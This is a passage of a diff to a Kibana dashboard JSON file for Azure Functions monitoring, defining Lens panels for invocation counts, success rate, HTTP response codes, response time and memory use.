"44c459b4-623b-4534-ba78-8904669ae9cb", + "title": "Success Rate", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-b0c25d59-67fb-4970-8b15-1da58db41925", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b0c25d59-67fb-4970-8b15-1da58db41925": { + "columnOrder": [ + "87ec7063-bff9-4d15-87e7-8f1da7b3f12b", + "bf6104e4-667c-4384-b819-842c52698256" + ], + "columns": { + "87ec7063-bff9-4d15-87e7-8f1da7b3f12b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bf6104e4-667c-4384-b819-842c52698256", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "c4d0be17-9d74-468d-8e55-a064664300d1", - "isTransposed": false - }, - { - "alignment": "left", - "colorMode": "cell", - "columnId": "2cbcc3e5-5848-4a88-910b-7c845618ae2e", - "isTransposed": false, - "palette": { - "name": "positive", - "params": { - "stops": [ - { - "color": "#d6e9e4", - "stop": 20 - }, - { - "color": "#aed3ca", - "stop": 40 - }, - { - "color": "#85bdb1", - "stop": 60 - }, - { - "color": "#5aa898", - "stop": 80 - }, - { - "color": "#209280", - "stop": 100 - } - ] - }, - "type": "palette" - }, - "summaryRow": "none" - }, - { - "alignment": "left", - "columnId": "b37bb938-9515-453c-a5ff-f384a7351317", - "isTransposed": false - } - ], - "layerId": "8e323fe9-19c2-405d-bbf6-ba61dc9a190f", - "layerType": "data" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "description": "Shows the number of successful invocations as a percentage of the total invocations per function app. ", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "44c459b4-623b-4534-ba78-8904669ae9cb", - "w": 23, - "x": 25, - "y": 0 - }, - "panelIndex": "44c459b4-623b-4534-ba78-8904669ae9cb", - "title": "Success Rate", - "type": "lens", - "version": "8.7.1" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-b0c25d59-67fb-4970-8b15-1da58db41925", - "type": "index-pattern" + "bf6104e4-667c-4384-b819-842c52698256": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.requests.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "b0c25d59-67fb-4970-8b15-1da58db41925": { - "columnOrder": [ - "87ec7063-bff9-4d15-87e7-8f1da7b3f12b", - "bf6104e4-667c-4384-b819-842c52698256" - ], - "columns": { - "87ec7063-bff9-4d15-87e7-8f1da7b3f12b": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "bf6104e4-667c-4384-b819-842c52698256", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "bf6104e4-667c-4384-b819-842c52698256": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.requests.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.requests.total" - } - }, - "incompleteColumns": {} - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.requests.total" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "b0c25d59-67fb-4970-8b15-1da58db41925", + "layerType": "data", + "legendDisplay": "default", + "legendPosition": "right", + "metrics": [ + "bf6104e4-667c-4384-b819-842c52698256" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "87ec7063-bff9-4d15-87e7-8f1da7b3f12b" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "9196bdde-1f73-46f5-97f6-09db15a28b61", + "w": 10, + "x": 0, + "y": 6 + }, + "panelIndex": "9196bdde-1f73-46f5-97f6-09db15a28b61", + "title": "Total Number of Invocations across Function Apps", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "Number of Function invocations that resulted in a HTTP 2xx response code", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-4689dc73-dc78-4c03-b975-62264d68c33b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "4689dc73-dc78-4c03-b975-62264d68c33b": { + "columnOrder": [ + "cb555077-660a-4e41-8974-9ad2d8e3b235", + "a3e51351-a9f0-414d-857e-d908e3919b15", + "a074efc1-3210-40c8-af5b-ba97da2de1ac" + ], + "columns": { + "a074efc1-3210-40c8-af5b-ba97da2de1ac": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.http2xx.total", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.http2xx.total" + }, + "a3e51351-a9f0-414d-857e-d908e3919b15": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "cb555077-660a-4e41-8974-9ad2d8e3b235": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a074efc1-3210-40c8-af5b-ba97da2de1ac", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "layerId": "b0c25d59-67fb-4970-8b15-1da58db41925", - "layerType": "data", - "legendDisplay": "default", - "legendPosition": "right", - "metrics": [ - "bf6104e4-667c-4384-b819-842c52698256" - ], - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "87ec7063-bff9-4d15-87e7-8f1da7b3f12b" - ] - } - ], - "shape": "donut" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "9196bdde-1f73-46f5-97f6-09db15a28b61", - "w": 10, - "x": 0, - "y": 6 - }, - "panelIndex": "9196bdde-1f73-46f5-97f6-09db15a28b61", - "title": "Total Number of Invocations across Function Apps", - "type": "lens", - "version": "8.7.1" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a074efc1-3210-40c8-af5b-ba97da2de1ac" + ], + "layerId": "4689dc73-dc78-4c03-b975-62264d68c33b", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "splitAccessor": "cb555077-660a-4e41-8974-9ad2d8e3b235", + "xAccessor": "a3e51351-a9f0-414d-857e-d908e3919b15" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "Number of Function invocations that resulted in a HTTP 2xx response code", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-4689dc73-dc78-4c03-b975-62264d68c33b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "4689dc73-dc78-4c03-b975-62264d68c33b": { - "columnOrder": [ - "cb555077-660a-4e41-8974-9ad2d8e3b235", - "a3e51351-a9f0-414d-857e-d908e3919b15", - "a074efc1-3210-40c8-af5b-ba97da2de1ac" - ], - "columns": { - "a074efc1-3210-40c8-af5b-ba97da2de1ac": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.http2xx.total", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http2xx.total" - }, - "a3e51351-a9f0-414d-857e-d908e3919b15": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "cb555077-660a-4e41-8974-9ad2d8e3b235": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "a074efc1-3210-40c8-af5b-ba97da2de1ac", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "5430e8a9-47ae-4c82-96b7-b0287026409f", + "w": 16, + "x": 0, + "y": 15 + }, + "panelIndex": "5430e8a9-47ae-4c82-96b7-b0287026409f", + "title": "HTTP 2xx Responses", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-54edca01-9fb6-444a-8d98-ddb0ff36f9be", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "54edca01-9fb6-444a-8d98-ddb0ff36f9be": { + "columnOrder": [ + "6eddce7c-5301-479c-ab7b-8c574999c145", + "38a86941-b5ec-4a83-9684-0f70bb14a361", + "94937bdd-d5bb-469e-83b9-89e34f3a4614" + ], + "columns": { + "38a86941-b5ec-4a83-9684-0f70bb14a361": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "6eddce7c-5301-479c-ab7b-8c574999c145": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "94937bdd-d5bb-469e-83b9-89e34f3a4614", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "a074efc1-3210-40c8-af5b-ba97da2de1ac" - ], - "layerId": "4689dc73-dc78-4c03-b975-62264d68c33b", - "layerType": "data", - "position": "top", - "seriesType": "bar", - "showGridlines": false, - "splitAccessor": "cb555077-660a-4e41-8974-9ad2d8e3b235", - "xAccessor": "a3e51351-a9f0-414d-857e-d908e3919b15" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "5430e8a9-47ae-4c82-96b7-b0287026409f", - "w": 16, - "x": 0, - "y": 15 - }, - "panelIndex": "5430e8a9-47ae-4c82-96b7-b0287026409f", - "title": "HTTP 2xx Responses", - "type": "lens", - "version": "8.7.1" + "94937bdd-d5bb-469e-83b9-89e34f3a4614": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.http4xx.total", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.http4xx.total" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "94937bdd-d5bb-469e-83b9-89e34f3a4614" + ], + "layerId": "54edca01-9fb6-444a-8d98-ddb0ff36f9be", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "splitAccessor": "6eddce7c-5301-479c-ab7b-8c574999c145", + "xAccessor": "38a86941-b5ec-4a83-9684-0f70bb14a361" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-54edca01-9fb6-444a-8d98-ddb0ff36f9be", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "54edca01-9fb6-444a-8d98-ddb0ff36f9be": { - "columnOrder": [ - "6eddce7c-5301-479c-ab7b-8c574999c145", - "38a86941-b5ec-4a83-9684-0f70bb14a361", - "94937bdd-d5bb-469e-83b9-89e34f3a4614" - ], - "columns": { - "38a86941-b5ec-4a83-9684-0f70bb14a361": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "6eddce7c-5301-479c-ab7b-8c574999c145": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "94937bdd-d5bb-469e-83b9-89e34f3a4614", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "94937bdd-d5bb-469e-83b9-89e34f3a4614": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.http4xx.total", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http4xx.total" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "Number of Function invocations that resulted in a HTTP 2xx response code", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2", + "w": 16, + "x": 16, + "y": 15 + }, + "panelIndex": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2", + "title": "HTTP 4xx Responses", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "Number of server errors or exceptions. ", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "419ba4b9-c54a-4e44-b7dc-475a2b04e4a8": { + "columnOrder": [ + "ed0b46b6-3210-492d-b67b-027e0b427588", + "f4765a92-4ba2-4936-afa3-7e8648c99a8d", + "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc" + ], + "columns": { + "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.http5xx.total", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.http5xx.total" + }, + "ed0b46b6-3210-492d-b67b-027e0b427588": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "94937bdd-d5bb-469e-83b9-89e34f3a4614" - ], - "layerId": "54edca01-9fb6-444a-8d98-ddb0ff36f9be", - "layerType": "data", - "position": "top", - "seriesType": "bar", - "showGridlines": false, - "splitAccessor": "6eddce7c-5301-479c-ab7b-8c574999c145", - "xAccessor": "38a86941-b5ec-4a83-9684-0f70bb14a361" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "Number of Function invocations that resulted in a HTTP 2xx response code", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2", - "w": 16, - "x": 16, - "y": 15 - }, - "panelIndex": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2", - "title": "HTTP 4xx Responses", - "type": "lens", - "version": "8.7.1" + "f4765a92-4ba2-4936-afa3-7e8648c99a8d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc" + ], + "layerId": "419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", + "layerType": "data", + "seriesType": "bar", + "splitAccessor": "ed0b46b6-3210-492d-b67b-027e0b427588", + "xAccessor": "f4765a92-4ba2-4936-afa3-7e8648c99a8d" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "Number of server errors or exceptions. ", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "419ba4b9-c54a-4e44-b7dc-475a2b04e4a8": { - "columnOrder": [ - "ed0b46b6-3210-492d-b67b-027e0b427588", - "f4765a92-4ba2-4936-afa3-7e8648c99a8d", - "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc" - ], - "columns": { - "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.http5xx.total", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http5xx.total" - }, - "ed0b46b6-3210-492d-b67b-027e0b427588": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "f4765a92-4ba2-4936-afa3-7e8648c99a8d": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "266a1bc1-c35b-4959-96c1-5d799a98754c", + "w": 16, + "x": 32, + "y": 15 + }, + "panelIndex": "266a1bc1-c35b-4959-96c1-5d799a98754c", + "title": "HTTP 5xx Error Responses", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The time taken for the app to serve requests.", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8d0f0cfa-b115-4100-ba7e-1cadee108055", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8d0f0cfa-b115-4100-ba7e-1cadee108055": { + "columnOrder": [ + "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f", + "234483e9-2403-442e-bb76-d6315e2517af", + "bde63578-63d7-43ab-ad04-0b810b2f4033" + ], + "columns": { + "234483e9-2403-442e-bb76-d6315e2517af": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bde63578-63d7-43ab-ad04-0b810b2f4033", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "8d98f3f5-27bb-4ad2-82ec-277d763ab9cc" - ], - "layerId": "419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", - "layerType": "data", - "seriesType": "bar", - "splitAccessor": "ed0b46b6-3210-492d-b67b-027e0b427588", - "xAccessor": "f4765a92-4ba2-4936-afa3-7e8648c99a8d" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "266a1bc1-c35b-4959-96c1-5d799a98754c", - "w": 16, - "x": 32, - "y": 15 - }, - "panelIndex": "266a1bc1-c35b-4959-96c1-5d799a98754c", - "title": "HTTP 5xx Error Responses", - "type": "lens", - "version": "8.7.1" + "bde63578-63d7-43ab-ad04-0b810b2f4033": { + "dataType": "number", + "isBucketed": false, + "label": "Average of azure.functions.http_response_time.avg", + "operationType": "average", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.http_response_time.avg" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bde63578-63d7-43ab-ad04-0b810b2f4033" + ], + "layerId": "8d0f0cfa-b115-4100-ba7e-1cadee108055", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f", + "xAccessor": "234483e9-2403-442e-bb76-d6315e2517af" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The time taken for the app to serve requests.", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8d0f0cfa-b115-4100-ba7e-1cadee108055", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The time taken for the app to serve requests.", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "5ef0d281-2eff-415a-ac37-d778985db835", + "w": 24, + "x": 0, + "y": 29 + }, + "panelIndex": "5ef0d281-2eff-415a-ac37-d778985db835", + "title": "Averave Response Time(in seconds)", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The current amount of memory used by the app. ", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-750303c4-2d5f-4b67-8018-cba6ccc3e3f8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "750303c4-2d5f-4b67-8018-cba6ccc3e3f8": { + "columnOrder": [ + "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f", + "03e43362-ec04-4c0a-8cdf-0bd29107feee", + "1d2a33f9-47f5-4483-bd25-bf258b7fe434" + ], + "columns": { + "03e43362-ec04-4c0a-8cdf-0bd29107feee": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "1d2a33f9-47f5-4483-bd25-bf258b7fe434": { + "dataType": "number", + "isBucketed": false, + "label": "Average of azure.functions.average_memory_working_set.avg", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8d0f0cfa-b115-4100-ba7e-1cadee108055": { - "columnOrder": [ - "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f", - "234483e9-2403-442e-bb76-d6315e2517af", - "bde63578-63d7-43ab-ad04-0b810b2f4033" - ], - "columns": { - "234483e9-2403-442e-bb76-d6315e2517af": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": 